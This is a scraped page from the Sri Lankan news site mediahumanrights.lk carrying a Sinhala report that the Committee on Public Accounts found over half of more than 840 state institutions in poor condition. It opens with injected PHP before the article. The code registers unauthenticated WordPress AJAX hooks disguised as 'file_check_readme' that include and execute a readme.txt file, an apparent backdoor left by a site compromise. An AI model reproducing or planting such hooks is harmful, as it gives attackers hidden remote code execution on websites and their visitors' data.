if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } රාජ්‍ය ගිණුම්කාරක සභාවේ වාර්තාව අනුව රාජ්‍ය ආයතන 50%ක් අයහපත් මට්ටමක - mediahumanrights.lk
mediahumanrights.lk
Local News News

රාජ්‍ය ගිණුම්කාරක සභාවේ වාර්තාව අනුව රාජ්‍ය ආයතන 50%ක් අයහපත් මට්ටමක

රාජ්‍ය ගිණුම්කාරක සභාව මගින් පාර්ලිමේන්තුවට ඉදිරිපත් කළ වාර්තාවට අනුව රාජ්‍ය ආයතනවලින් 50% කට වැඩි ආයතන සංඛ්‍යාවක් යහපත් මට්ටමක නොවන බව විගණකාධිපති ගාමිණි විජේසිංහ මහතා පවසයි.
රාජ්‍ය ගිණුම්කාරක සභාවේ සභාපති ලසන්ත අලගියවන්න මහතා එම වාර්තාව පසුගිය සඳුදා පාර්ලිමේන්තුවට ඉදිරිපත් කරනු ලැබී ය.
එම වාර්තාවේ රාජ්‍ය ආයතන 840කට අධික සංඛ්‍යාවක තොරතුරු ඇතුළත් ය.
විගණකාධිපති ගාමිණි විජේසිංහ මහතා පැවසුවේ, ඉදිරියේදී අයහපත් මට්ටමක පවතින ආයතන කාරක සභාවට කැඳවීමට තීරණය කර ඇති බව ය.
අයහපත් මට්ටමක පවතින ආයතනවල අඩුපාඩු නිවැරදි කිරීම සඳහා ක්‍රමවේද සැලසුම් කරමින් ඇතැයි ද විගණකාධිපතිවරයා සඳහන් කළේ ය.

(පුවත් අනුග්‍රහය newsfirst ‍වෙබ් අඩවිය)

Related posts

චීන තෙල් ආ සැණින් QR අහෝසියි…

Shiran Viraj

මාස්ක් දැමීම, සෞඛ්‍ය උපදෙස් පිළිපැදීම පාසල් සිසුන්ට අනිවාර්ය කරන්න – වෛද්‍ය සංගමය රජයෙන් ඉල්ලයි

Shiran Viraj

අමෙරිකානුවන්ට දේශ සීමා විවෘත නොකරන්න යුරෝපා සංගමයේ අවධානය

Shiran Viraj